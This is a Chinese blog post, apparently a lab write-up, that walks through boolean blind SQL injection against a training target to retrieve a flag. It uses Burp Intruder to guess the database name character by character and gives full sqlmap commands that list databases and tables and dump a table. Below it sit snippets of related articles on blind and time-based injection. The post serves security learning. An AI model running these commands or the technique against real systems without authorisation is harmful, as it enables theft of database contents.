18、SQL盲注

最新推荐文章于 2024-04-23 09:08:55 发布
最新推荐文章于 2024-04-23 09:08:55 发布
阅读量251 收藏 1
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/songling515010475/article/details/106274228
版权
本文介绍了SQL盲注的基本概念和过程,包括判断注入存在、确定库名长度、爆破库名字符,以及利用Burp Suite进行批量测试。通过布尔型盲注的原理,逐步揭示数据库信息,并利用sqlmap工具加速攻击过程,最终获取目标库名、表结构和数据。
摘要由CSDN通过智能技术生成

Boolen盲注就是通过判断数据能不能够回显来判断是否存在盲注,既然是Boolean型盲注哪么从字面意思上就可以知道,返回的值True/False

1.判断是否存在SQL注入

 

 2.尝试获判断库名的长度(这里我己经通过大于小于判断出来了库名长度为12)

 

3.通过Burp抓包,尝试对库名第一位进行爆破

4.设置从0~127位,每一个都去进行比较

5.通过Response返回结果不一样的,看结果是否正常返回了数据,正常说明条件为True,说明就是这个字符。这里爆破出来的第一个字符为107,对应Ascii表的是字母“k”

 

6.通过一个个去比较太慢,得用burp可以批量爆破,这里把截取的位数也进行动态匹配

7.前面知道了数据库的长为12,所以这里把第一位设置成从第一位截起,截12次,第二位则还是从0~127 位,然后交叉匹配。

8.通过比量爆破得到库名

 

9.上面知道盲注的原理其实就是一个字“猜”,下面使用kali的sqlmap进行爆破取得所有库名。

root@sl:~# sqlmap -u "inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" --dbs

10.我要的Flag在”kanwolongxia”,接着对该库进行爆破。
 

root@sl:~# sqlmap -u “inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1” -D kanwolongxia —tables

 

11.爆表结构

root@sl:~# sqlmap -u "inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" -D kanwolongxia -T loflag --columns

12.获取数据

root@sl:~# sqlmap -u "inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" -D kanwolongxia -T loflag -C flaglo --dump

 

sql盲注
weixin_55710577的博客
04-09 7551
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 sql注入--盲注前言一、什么是盲注二、步骤示例1.测试注入点2.测所在数据库长度3. 利用ASCII码猜当前数据库名4.利用ASCII码查询表名5、利用ASCII码查询字段名sql手注所用到的函数总结sqlmap进行sql盲注 前言 靶场环境:sqli-labs-master 第8关 注入攻击的本质:把用户的输入当作代码执行。 其中存在两个关键条件: (1)用户可以控制输入。 (2)用户的输入被拼接到原代码上被执行。 提示:以下是本篇.
SQL注入之盲注
最新发布
2301_81242582的博客
09-02 476
【代码】SQL注入之盲注
SQL盲注
weixin_59872639的博客
02-18 2507
盲注SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,盲注可分为两类: 基于布尔的盲注Boolean based) 基于时间的盲注(Time based) 基于布尔的盲注 某些场合下,页面返回的结果只有两种(正常或错误) 。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些S
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
BurpSuite辅助SQL盲注安装教程
03-10
BurpSuite辅助SQL盲注安装教程
python编写的sql盲注
10-28
python编写的sql盲注
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
确认并利用 SQL 盲注漏洞
2301_77324496的博客
11-04 167
在服务器端,sql 注入和 sql 盲注是同类型的漏洞,都是因为对输入内容不检测或检查不充分导致脏数据进入了数据库中。我们这个语的意思是猜测第一个字母是不是同样的,我们把该请求发送到intruder 模块,将a设置为改变参数。1. 这个表单和上面的 sql 注入表单(SQL Injection)一模一样,输入1可以查看id为1的用户信息。15.我们的载荷列表是a-z,1-9,所合。20.下面继续猜解后面的字符。最后我们测试出来的结果是 dvwa@%,最后一个%匹配的是空字符,所以用户名是 dvwa@
SQL注入-盲注
m0_53820621的博客
08-12 783
SQL注入-盲注
sql注入(盲注
2302_79119987的博客
04-23 2592
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
SQL Injection (Blind)之盲注(原理、分类、利用)
m0_59598029的博客
04-20 1070
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注Boolean based)基于时间的盲注(Time based)
学习sql注入:猜测数据库_学习SQL:删除和更新数据SQL最佳实践
culuo4781的博客
07-22 511
学习sql注入:猜测数据库 Deleting and updating data is very common, but if performed without taking care, which could lead to inconsistent data or data loss. Today, we’ll talk about SQL best practices when pe...
SQL注入之盲注(boolean盲注和时间盲注)
ws1813004226的博客
05-12 798
一、boolen盲注 boolen就是系统屏蔽返回错误信息,只返回是或不是,所以我们不能直观的得到数据库信息,在这里,我们就只能通过boolen盲注进行注入。 我们依旧使用pikachu靶场进行测试,这里肯定是存在SQL注入的,就不再多作演示。 我们先看一下为什么这里只能用boolen注入。我们在union和boolen注入处都输入: kobe' order by 3# 可以看到,uhion注入是不屏蔽报错信息的,而boolen注入只显示你输入有误,屏蔽了报错信息。 而只有当我们输入正确的时候,才会返
SQL盲注攻击技术详解
"这篇文档是关于SQL盲注攻击技术的综述,由Javaphile撰写,适合学习数据库安全的人员阅读。文章首先定义了SQL注入及其风险,并回顾了现有的解决方案及其不足。接着,它讨论了在服务器仅给出最小响应的情况下如何识别...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值